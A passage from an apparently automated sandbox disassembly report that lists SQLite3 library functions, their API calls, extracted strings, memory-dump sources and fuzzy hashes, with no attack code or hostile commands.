                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5315D
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E53165
                                                                                                      • Part of subcall function 61E0A3E4: sqlite3_free.SQLITE3 ref: 61E0A407
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_finalize$sqlite3_free$sqlite3_mutex_enter$sqlite3_log
                                                                                                    • String ID:
                                                                                                    • API String ID: 3407354183-0
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E751D1
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E75602
                                                                                                      • Part of subcall function 61E5DE8A: sqlite3_strnicmp.SQLITE3 ref: 61E5DF16
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                                                                    • String ID: 2$foreign key$hfa$indexed$zGa$a
                                                                                                    • API String ID: 100587609-3085767028
                                                                                                    APIs
                                                                                                    • sqlite3_step.SQLITE3(?,?,?,?,?,?,?,00000000,00000000,?,61E75558), ref: 61E75064
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E750E4
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E75132
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_finalize$sqlite3_step
                                                                                                    • String ID: integer$null$real$a
                                                                                                    • API String ID: 2395141310-487827753
                                                                                                    • Opcode ID: 756c54bc2a750ea77fb058a8b57413d990c0b600de22c89934de3c42f66cbb8c
                                                                                                    • Instruction ID: 917d7df8442e0dfbff9f44126c17f7c3d42f4d594d38a617966b95e93ae3be30
                                                                                                    • Opcode Fuzzy Hash: 756c54bc2a750ea77fb058a8b57413d990c0b600de22c89934de3c42f66cbb8c
                                                                                                    • Instruction Fuzzy Hash: 184129B0A04755CFDB14DFA9C48069ABBF0FF88314F25896DD888AB315D375E850CBA5
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 423083942-0
                                                                                                    • Opcode ID: 9226e29851443d3625460d2d68673013ce65603e1ecb7a68a7ef1e91518989b2
                                                                                                    • Instruction ID: df4436a1479cdf927db24c907f596cbd476b935ce297b1554315df81c653624b
                                                                                                    • Opcode Fuzzy Hash: 9226e29851443d3625460d2d68673013ce65603e1ecb7a68a7ef1e91518989b2
                                                                                                    • Instruction Fuzzy Hash: C10201B4A49249DFDB04CFA8C481A9DBBF1BF88314F258559E855AB319D730EC46CFA0
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strncmp$sqlite3_realloc
                                                                                                    • String ID: -$]$false$null$true$}
                                                                                                    • API String ID: 376036412-91656745
                                                                                                    • Opcode ID: f65ec85e27c3a886c27a0dc306621be24901e773fae27f0b2bffa2f4cbe1256a
                                                                                                    • Instruction ID: 86c097667253551db3a2ec989e748949befe99172bdcf33b275f269b24f58c0f
                                                                                                    • Opcode Fuzzy Hash: f65ec85e27c3a886c27a0dc306621be24901e773fae27f0b2bffa2f4cbe1256a
                                                                                                    • Instruction Fuzzy Hash: A4C10478E0C6954FDB12CE68C48A799FBF1BF4A318F68C55AD4928B389C379D446CB01
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E53037: sqlite3_blob_close.SQLITE3 ref: 61E5305A
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E532E9
                                                                                                      • Part of subcall function 61E51966: sqlite3_log.SQLITE3 ref: 61E5198A
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E532F4
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E532FF
                                                                                                      • Part of subcall function 61E51966: sqlite3_mutex_enter.SQLITE3 ref: 61E519A9
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E5330A
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53315
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53320
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E5332B
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53336
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5333E
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_finalize$sqlite3_mutex_enter$sqlite3_blob_closesqlite3_freesqlite3_log
                                                                                                    • String ID:
                                                                                                    • API String ID: 3147689611-0
                                                                                                    • Opcode ID: 1a69bbdb9c0857768f549618eadf4d27dfbb221866c1af506e5c860c17cf11dd
                                                                                                    • Instruction ID: 45d819236f4eb1590716b9db474780ec280119c1ac5817b45f9e4f5b85a67023
                                                                                                    • Opcode Fuzzy Hash: 1a69bbdb9c0857768f549618eadf4d27dfbb221866c1af506e5c860c17cf11dd
                                                                                                    • Instruction Fuzzy Hash: 3E0167B45047818FCB44AFB8C1C4918BBF0EF84758F65889CD8899B31AE736D994CB51
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E53037: sqlite3_blob_close.SQLITE3 ref: 61E5305A
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E532E9
                                                                                                      • Part of subcall function 61E51966: sqlite3_log.SQLITE3 ref: 61E5198A
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E532F4
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E532FF
                                                                                                      • Part of subcall function 61E51966: sqlite3_mutex_enter.SQLITE3 ref: 61E519A9
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E5330A
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53315
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53320
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E5332B
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 61E53336
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5333E
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_finalize$sqlite3_mutex_enter$sqlite3_blob_closesqlite3_freesqlite3_log
                                                                                                    • String ID:
                                                                                                    • API String ID: 3147689611-0
                                                                                                    • Opcode ID: 0f07761dd9221afcec7a14b5a3c581e16080f514307ca46abd4e2379b2d7b6ce
                                                                                                    • Instruction ID: 541e3c3a5de75e20283e1ff0cabd4d6007058de2c9e6a079b7d5754b50dde26f
                                                                                                    • Opcode Fuzzy Hash: 0f07761dd9221afcec7a14b5a3c581e16080f514307ca46abd4e2379b2d7b6ce
                                                                                                    • Instruction Fuzzy Hash: 000158B45047C18BCB44BFB8C1C4518BBF4EF44658F55489CD8C99B30AE736D994CB62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: F
                                                                                                    • API String ID: 0-3850746006
                                                                                                    • Opcode ID: 2f95c15b2eb9a432fbd4b942522ba2c7ad5a893a8466aa354c5720371369b2d6
                                                                                                    • Instruction ID: b30aa592c9606d0a7b69c97d8cc92aca110bc80e2624b04f23400f69460a43cc
                                                                                                    • Opcode Fuzzy Hash: 2f95c15b2eb9a432fbd4b942522ba2c7ad5a893a8466aa354c5720371369b2d6
                                                                                                    • Instruction Fuzzy Hash: 0F81BC74A05A118FDB40EFA8C980649BBF2FBC5754F29C869E84CCB344D731E942CB52
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                                                                    • String ID: @
                                                                                                    • API String ID: 1503958624-2766056989
                                                                                                    • Opcode ID: 60aee9ea40aab68af79e6df5610f4eecb8e258f19af9048b8a1c840d984bb8c9
                                                                                                    • Instruction ID: f82871060a407b91e66b33a648292cfa058b874e1f09ce83e9b304626e84e32f
                                                                                                    • Opcode Fuzzy Hash: 60aee9ea40aab68af79e6df5610f4eecb8e258f19af9048b8a1c840d984bb8c9
                                                                                                    • Instruction Fuzzy Hash: 5D4145B5915B029FDB40EF68C584A0AFBE1FB85358F64C91DE89D97380E334E884CB52
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E23B2F
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E23B3D
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E23B4A
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E23B78
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E23BA2
                                                                                                    • sqlite3_result_int.SQLITE3 ref: 61E23BE2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                                                                                    • String ID: 5a
                                                                                                    • API String ID: 4226599549-1978421491
                                                                                                    • Opcode ID: 2cc03a882cae7cefcfb45b62e5108ef0c8bde66bdbfa043cfffab11f62d7e246
                                                                                                    • Instruction ID: 2b7521870fce3e4e94fcf0f4702942077138794d6a1db02f6f244af4459149bf
                                                                                                    • Opcode Fuzzy Hash: 2cc03a882cae7cefcfb45b62e5108ef0c8bde66bdbfa043cfffab11f62d7e246
                                                                                                    • Instruction Fuzzy Hash: C22114709087459BCB00DFA9C595A99FBF1BF88328F20C52EE8AA9B390D731D841CF51
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_finalize$sqlite3_log
                                                                                                    • String ID:
                                                                                                    • API String ID: 83268734-0
                                                                                                    • Opcode ID: 000f108c336fb9a3ed0139af9226091063ebc9212437db9f46c606c7d2eefbf6
                                                                                                    • Instruction ID: 5ef85ac33cb3beb89fff54747c93703cf5945466df08773495135d114bf54870
                                                                                                    • Opcode Fuzzy Hash: 000f108c336fb9a3ed0139af9226091063ebc9212437db9f46c606c7d2eefbf6
                                                                                                    • Instruction Fuzzy Hash: 7D01C5B4504A419BCB10AFB8C4C4559BBE4EF48365F528A69EC8E8B305DB74D890CF51
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_strnicmp
                                                                                                    • String ID: :a
                                                                                                    • API String ID: 1961171630-2899067487
                                                                                                    • Opcode ID: 72a24fe719f091fa4efcd3426caad224498c1a24f2161d72900f383498533726
                                                                                                    • Instruction ID: c15fe2bd0a4b26cb9938837279c8592802aa932a30ba2301bc44475842b1ed19
                                                                                                    • Opcode Fuzzy Hash: 72a24fe719f091fa4efcd3426caad224498c1a24f2161d72900f383498533726
                                                                                                    • Instruction Fuzzy Hash: 7D51087554D24589FB204E9888823E9BFA79F4330FF79D41AD4A587251D37EC0BB8A03
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                                                                                    • String ID:
                                                                                                    • API String ID: 3386002893-0
                                                                                                    • Opcode ID: 0e435223d6235bd9a72acf04055ed1a5ebaabdb4ccc663752a0153102643fa42
                                                                                                    • Instruction ID: 94d21cdb1b9784f71ae68d5f63349051d909b4c1e651fe816a0688860aa94995
                                                                                                    • Opcode Fuzzy Hash: 0e435223d6235bd9a72acf04055ed1a5ebaabdb4ccc663752a0153102643fa42
                                                                                                    • Instruction Fuzzy Hash: F7619B70A042558FEB04DFACC5A069DBBF1AF8D314F25C66EE8A5AB391D730D842CB51
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: Sleep_amsg_exit
                                                                                                    • String ID:
                                                                                                    • API String ID: 1015461914-0
                                                                                                    • Opcode ID: bce5228ecbe7f0fc739df63516fc92ade41788d304e6aa52f20a3708bc7c9bf0
                                                                                                    • Instruction ID: 40adf2c5f99e95fc4ed1983a49bd695402b4968f80a683025326873170e7aa61
                                                                                                    • Opcode Fuzzy Hash: bce5228ecbe7f0fc739df63516fc92ade41788d304e6aa52f20a3708bc7c9bf0
                                                                                                    • Instruction Fuzzy Hash: BC417CB4A156518BEB01AFE8C58071A7BF2FB8635DF64C92ED4848F344D7B5C891CB82
                                                                                                    APIs
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E36CA5
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E36CB7
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E36CCD
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E36CDB
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E36DBD
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E36DC8
                                                                                                    • sqlite3_result_error_code.SQLITE3 ref: 61E36DDE
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_result_errorsqlite3_result_error_codesqlite3_result_textsqlite3_value_int
                                                                                                    • String ID:
                                                                                                    • API String ID: 2838836587-0
                                                                                                    • Opcode ID: 249a2aee32f34b8baa99c002f29403e700cf7c8192e5ce86475ed1ac59772233
                                                                                                    • Instruction ID: ef903a0660821e4582548f20e4be7daa42110b6fdeb12b0369a795bf7dc934a7
                                                                                                    • Opcode Fuzzy Hash: 249a2aee32f34b8baa99c002f29403e700cf7c8192e5ce86475ed1ac59772233
                                                                                                    • Instruction Fuzzy Hash: D85183B49047999FCB00DFA8C48469EBBF4BF88354F11892AE898AB354E734D985CF51
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 2264764126-0
                                                                                                    • Opcode ID: c904daac01daa61eb509d9b9379ca7d83bfb6be7c7e9e32c1f7686342d02d846
                                                                                                    • Instruction ID: 03277061384cf4bc7b09d9d5d34b598b395f8447fb1a5dcd03370a584af2c8b9
                                                                                                    • Opcode Fuzzy Hash: c904daac01daa61eb509d9b9379ca7d83bfb6be7c7e9e32c1f7686342d02d846
                                                                                                    • Instruction Fuzzy Hash: 3D318FB5A046568FDB04DFA9C4A06ADFBF1EF8C314F25802AD8A99B300E735D941CF95
                                                                                                    APIs
                                                                                                    • sqlite3_log.SQLITE3 ref: 61E28D21
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E28E30), ref: 61E28D35
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E28E30), ref: 61E28D5D
                                                                                                    • sqlite3_log.SQLITE3 ref: 61E28D7B
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E28E30), ref: 61E28DB1
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                    • String ID: ia
                                                                                                    • API String ID: 1015584638-2003154554
                                                                                                    • Opcode ID: da09f2a95ed6ded4b63c9d88051cad9571b90e78593c8a632dcd86cb6427e51b
                                                                                                    • Instruction ID: 5ecb70d65ce8323d51f9053ebfd5a0ba8d2c080f6a380437f9c6b22e5007cb24
                                                                                                    • Opcode Fuzzy Hash: da09f2a95ed6ded4b63c9d88051cad9571b90e78593c8a632dcd86cb6427e51b
                                                                                                    • Instruction Fuzzy Hash: 2C31CE356046508FDB009F68C8A0B4677F5EFC9318F29C969E8488F32AD734D8859792
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E3843B
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E3846A
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E3848F
                                                                                                      • Part of subcall function 61E37CFF: sqlite3_mprintf.SQLITE3 ref: 61E37D14
                                                                                                      • Part of subcall function 61E37CFF: sqlite3_result_error.SQLITE3 ref: 61E37D2A
                                                                                                      • Part of subcall function 61E37CFF: sqlite3_free.SQLITE3 ref: 61E37D32
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                                                                    • String ID: insert$set
                                                                                                    • API String ID: 832408550-3711289001
                                                                                                    • Opcode ID: a48f020bd02721147aca079f07da59a2e0ed00399dc12631184557adaa704568
                                                                                                    • Instruction ID: 5543241034da7eb376943ffe8e40ae73765a1ed35f27b1fa77af480c7766e75c
                                                                                                    • Opcode Fuzzy Hash: a48f020bd02721147aca079f07da59a2e0ed00399dc12631184557adaa704568
                                                                                                    • Instruction Fuzzy Hash: 80316730A082598BDB11DF68D484B9EBBF5AFC8308F24C51EE884CB751DB38E945DB41
                                                                                                    APIs
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E33F62
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E33FC5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_result_error
                                                                                                    • String ID: J
                                                                                                    • API String ID: 497837271-1141589763
                                                                                                    • Opcode ID: eb668ba508c894fcc32be1e8c00a43d4a7b9989bff98ed3f8f3c176d5a1cff94
                                                                                                    • Instruction ID: 4b93f52b0d59fa72b21b1f9dad8c42799aae0485a3371d571aacd80f8ba437fc
                                                                                                    • Opcode Fuzzy Hash: eb668ba508c894fcc32be1e8c00a43d4a7b9989bff98ed3f8f3c176d5a1cff94
                                                                                                    • Instruction Fuzzy Hash: AE314174B08795DBDB10EF38C885B49BBA0AFC4314F24C52DE8998B385D739D889CB42
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E338B2
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E338BC
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E338E6
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E338F1
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E33931
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_error
                                                                                                    • String ID: null
                                                                                                    • API String ID: 1955785328-634125391
                                                                                                    • Opcode ID: 9a25601098fd02c1e49466cf7d47ef865d06988eb0735262c326c3a56bfc0195
                                                                                                    • Instruction ID: cf6af3531cb56ee589fac40dbeadf75e6d5bc17154ae5593e4cbba9c070d078f
                                                                                                    • Opcode Fuzzy Hash: 9a25601098fd02c1e49466cf7d47ef865d06988eb0735262c326c3a56bfc0195
                                                                                                    • Instruction Fuzzy Hash: 311108B2F486548BD704EA699491655FBE1D7C9328F24C42EE5898B384D275C886C781
                                                                                                    APIs
                                                                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E34237
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E3425C
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E34289
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E342AF
                                                                                                    • sqlite3_result_subtype.SQLITE3 ref: 61E342BF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                                                                    • String ID: J
                                                                                                    • API String ID: 3250357221-1141589763
                                                                                                    • Opcode ID: b5f9ec598dea7b7a58e175c3784db65ab15ba7204a2fff13599c2690ae709099
                                                                                                    • Instruction ID: a9ab5371d3c2b894e5ec624cc879e9290638db5bf38cc2dbdcc107b68add9c7d
                                                                                                    • Opcode Fuzzy Hash: b5f9ec598dea7b7a58e175c3784db65ab15ba7204a2fff13599c2690ae709099
                                                                                                    • Instruction Fuzzy Hash: 3C112AB05087509BEB00AF68C08531ABFE4AF85B18F24C84EE8D89B345D379C855CBD6
                                                                                                    APIs
                                                                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E340FB
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E3411E
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E3414B
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E34171
                                                                                                    • sqlite3_result_subtype.SQLITE3 ref: 61E34181
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                                                                    • String ID: J
                                                                                                    • API String ID: 3250357221-1141589763
                                                                                                    • Opcode ID: dbbfab0f1078eda5a62932de0f63c451b0be6ecb197c86ad8b508d0a9f7b99bc
                                                                                                    • Instruction ID: 3a8751ba2d59f2e51f39894632475cc41b9fd0aa382fecf7a7898c216a674033
                                                                                                    • Opcode Fuzzy Hash: dbbfab0f1078eda5a62932de0f63c451b0be6ecb197c86ad8b508d0a9f7b99bc
                                                                                                    • Instruction Fuzzy Hash: F1117CB06087509BD700AF68C58131ABFE0AF84768F24C44EE8E88B349D37AC944CB96
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28B6C: sqlite3_log.SQLITE3(?,?,?,?,?,61E28C1F), ref: 61E28BA7
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E29AB3
                                                                                                    • sqlite3_value_text16le.SQLITE3 ref: 61E29AC7
                                                                                                    • sqlite3_value_text16le.SQLITE3 ref: 61E29AF5
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29B09
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: library routine called out of sequence$out of memory
                                                                                                    • API String ID: 3568942437-3029887290
                                                                                                    • Opcode ID: 17b9eb7b49433d9af18b749f9056d2616b246f005f8279986dd1805f82ac9684
                                                                                                    • Instruction ID: 3dd9e2278883d49438814040e53fd1a7c112fc96c3ea8a6f698e21cf4501e52e
                                                                                                    • Opcode Fuzzy Hash: 17b9eb7b49433d9af18b749f9056d2616b246f005f8279986dd1805f82ac9684
                                                                                                    • Instruction Fuzzy Hash: F1015E75A083925BDB10AFB9C9D0A5ABBE4AF84358F69C8BDDC48CB305E771CC408791
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_logstrcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 2202632817-0
                                                                                                    • Opcode ID: d49bf92def8714c7f87a1cbb51c513b54f3e23fb3cc812a25893fcdb06c0d25c
                                                                                                    • Instruction ID: 8bac28c2b058e99bf104cec5d39bc63650811f4f5cfc8de139da58aab139d3da
                                                                                                    • Opcode Fuzzy Hash: d49bf92def8714c7f87a1cbb51c513b54f3e23fb3cc812a25893fcdb06c0d25c
                                                                                                    • Instruction Fuzzy Hash: 15F1D070A442699FDB04DFA9C48079DBBF1BF88308F248529E859EB364D775E886CF41
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 2585109301-0
                                                                                                    • Opcode ID: fd3b52063955b5430798387adb71dabf2c28f7f59be071152ac897afe705eab3
                                                                                                    • Instruction ID: e3b5f97f4ab9d1ec82d1603466d5dd0598fc2ed613b833747bf0d65009e4a861
                                                                                                    • Opcode Fuzzy Hash: fd3b52063955b5430798387adb71dabf2c28f7f59be071152ac897afe705eab3
                                                                                                    • Instruction Fuzzy Hash: 8BA123B5A042868FDB00CF69C481B9AB7F1BF89314F29C5A9EC559B309D774E851CFA0
                                                                                                    APIs
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E3767A
                                                                                                      • Part of subcall function 61E35200: sqlite3_initialize.SQLITE3 ref: 61E35206
                                                                                                      • Part of subcall function 61E35200: sqlite3_vmprintf.SQLITE3 ref: 61E35220
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E377BA
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E377C2
                                                                                                      • Part of subcall function 61E351D2: sqlite3_free.SQLITE3 ref: 61E351E1
